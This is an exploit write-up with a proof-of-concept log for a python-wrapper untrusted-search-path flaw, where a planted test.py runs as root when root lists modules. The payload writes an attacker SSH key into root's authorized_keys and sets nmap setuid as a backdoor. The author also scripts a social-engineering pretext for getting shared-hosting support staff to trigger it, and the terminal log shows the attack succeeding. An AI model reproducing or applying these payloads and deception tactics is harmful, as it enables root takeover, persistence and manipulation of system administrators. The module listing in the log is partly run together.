# python-wrapper untrusted search path/code execution vulnerability
# Python-wrapper executes any test.py script within the current working directory, when supplied with help('modules').
# A non-priviledged user may gain code execution by tricking root to help('modules') or help() and then modules from within python-wrapper
# while within a non-priviledged user's work directory.
# The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command, and then continuing normally
# with no signs of compromise if you redirect command output. os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not
# work, however os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does.
# Additionally, nmap makes a great backdoor from a non-priviledged user account because it's something that looks like you might actually
# want SETUID under certain circumstances, but not really(and it will bitch if invoked). In nmap 5.31DC1 the most useful switch(--interactive) was removed
# which previously allowed you to bang out a shell(!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites.
# NOW however there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable SETUID program
# with input-output commands.
# A practical example of how this vulnerability could be useful is if you wish to attack a shared webhosting enviornment.
# After convincing root(support) to cd in to your directory, perhaps by uploading a broken "distraction.py" and getting him to troubleshoot it,
# you could pose the question: "Hey, what python modules do you guys have installed?" "I'm not quite sure how to list that..."
# "You can list the modules installed by entering python-wrapper, and typing help('modules')" "Oh!" *silent test.py execution by root*
# "There's a lot of them... would you like them as an email attachment?" "Yeah, thanks. I think I'll look at that and try troubleshooting this more myself".
# - ShadowHatesYou (Shadow@SquatThis.net)
# 6/30/12
root@tourian:/home/shadow/python# ls -hl test.py
-rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py
root@tourian:/home/shadow/python# cat test.py
import os
os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap')
root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
root@tourian:/home/shadow/python# python-wrapper
Python 2.7.3 (default, May4 2012, 00:13:26)
[GCC 4.6.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...
ArgImagePlugin_bisect email pprint
BaseHTTPServer_codecs encodings pptransport
Bastion _codecs_cnerrno ppworker
BdfFontFile _codecs_hkexceptionsprofile
BeautifulSoup _codecs_iso2022 fcntl pstats
BeautifulSoupTests_codecs_jpfilecmp pty
BitTornado_codecs_krfileinput pwd
BmpImagePlugin_codecs_twfnmatch py_compile
BufrStubImagePlugin _collectionsformatter pyclbr
CDROM _cracklib fpformatpydoc
CGIHTTPServer _csvfractions pydoc_data
ConfigParser_ctypes ftplibpyexpat
ContainerIO _ctypes_testfunctools pyrit_cli
Cookie_curses future_builtins pyximport
Crypto_curses_panel gamin quopri
Cython_emerge gdbmre
DLFCN _functoolsgenericpath readline
DocXMLRPCServer _gv getoptrepr
EpsImagePlugin_hashlibgetpass resource
ExifTags_heapqgettext rexec
FitsStubImagePlugin _hotshotgit_remote_helpersrfc822
FontFile_imagingftgrp robotparser
GbrImagePlugin_io gziprunpy
GdImageFile _json hashlib scapy
GifImagePlugin_lcms heapq sched
GimpGradientFile_ldns hmacscipy
GimpPaletteFile _locale hotshot select
GribStubImagePlugin _lsprof htmlentitydefssets
HTMLParser_md5htmllib setuptools
Hdf5StubImagePlugin _multibytecodec httplib sgmllib
IcnsImagePlugin _pyio imaplib shelve
IcoImagePlugin_random imghdrshlex
ImImagePlugin _shaimp shutil
Image _sha256 importlib signal
ImageChops_sha512 imputil site
ImageCms_socket inspect smtpd
ImageDraw _sslitertools sndhdr
ImageDraw2_strptime java_config_2 socket
ImageEnhance_struct javatoolkit spwd
ImageFile _symtable jsonsre
ImageFileIO _testcapi keyword sre_compile
ImageFilter _threading_locallcmssre_constants
ImageFont _unboundldnssre_parse
ImageGL _warnings ldnsx ssl
ImageGrab _weakreflib2to3 stat
ImageMath _weakrefset libsvnstatvfs
ImageMode _xmlpluslibxml2 string
ImageOpsabc libxml2modstringold
ImagePaletteaifclibxslt stringprep
ImagePath antigravity libxsltmodstrop
ImageQt anydbmlinecache struct
ImageSequence argparselinuxaudiodev subprocess
ImageShow array localesunau
ImageStat ast logging sunaudio
ImageTk asynchatlxmlsvn
ImageTransformasyncoremacpath symbol
ImageWinatexitmacurl2path symtable
ImtImagePluginaudiodevmagic sys
IptcImagePlugin audioop mailbox sysconfig
JpegImagePlugin base64mailcap syslog
McIdasImagePlugin bdb markupbasetabnanny
MicImagePluginbinasciimarshal tarfile
MpegImagePlugin bisectmd5 tempfile
MspImagePluginbs4 mhlib termios
OleFileIO bz2 mimetools test
OpenIPMIcPickle mimetypes textwrap
PAM cProfilemimifythis
PIL cStringIO mirrorselectthread
PaletteFile cgi modulefindertime
PalmImagePlugin cgitb multifile timeit
PcdImagePluginchunk multiprocessing toaiff
PcfFontFile cmath mutex token
PcxImagePlugincmd netrc tokenize
PdfImagePlugincodenetsnmp trace
PixarImagePlugincodecsnew traceback
PngImagePlugincodeopnis tty
PpmImagePlugincollections nntplib types
Queue commandsnturl2pathunboundmodule
SgiImagePlugincompileallnumbers unicodedata
SimpleHTTPServercompilernumpy unittest
SocketServercookielib operatorurllib2
SpiderImagePlugin copyoptparseurlparse
TYPES cracklibossaudiodev uuid
TarIO crypt paramikowarnings
TiffImagePlugin ctypespdb weakref
UserDictcythonpickletools whichdb
UserListdatetimepipes wsgiref
UserStringdbm pkg_resources xattr
WalImageFiledecimal pkgutil xcbgen
WmfImagePlugindifflib platformxdelta3main
XbmImagePlugindis popen2xen
XpmImagePlugindistutils poplibxml
_LWPCookieJar dnetportage xmllib
_MozillaCookieJar doctest posix xmlrpclib
_OpenIPMI drv_libxml2 posixfile xxsubtype
__builtin__ dumbdbm posixpath yasm
_abcoll dummy_threading ppautozipimport
Enter any module name to get more help.Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
>>> quit()
root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# cat /root/.ssh/authorized_keys
ssh-rss pwned byshadow
# Wish I had DuoSecurity!
# See you at Defcon!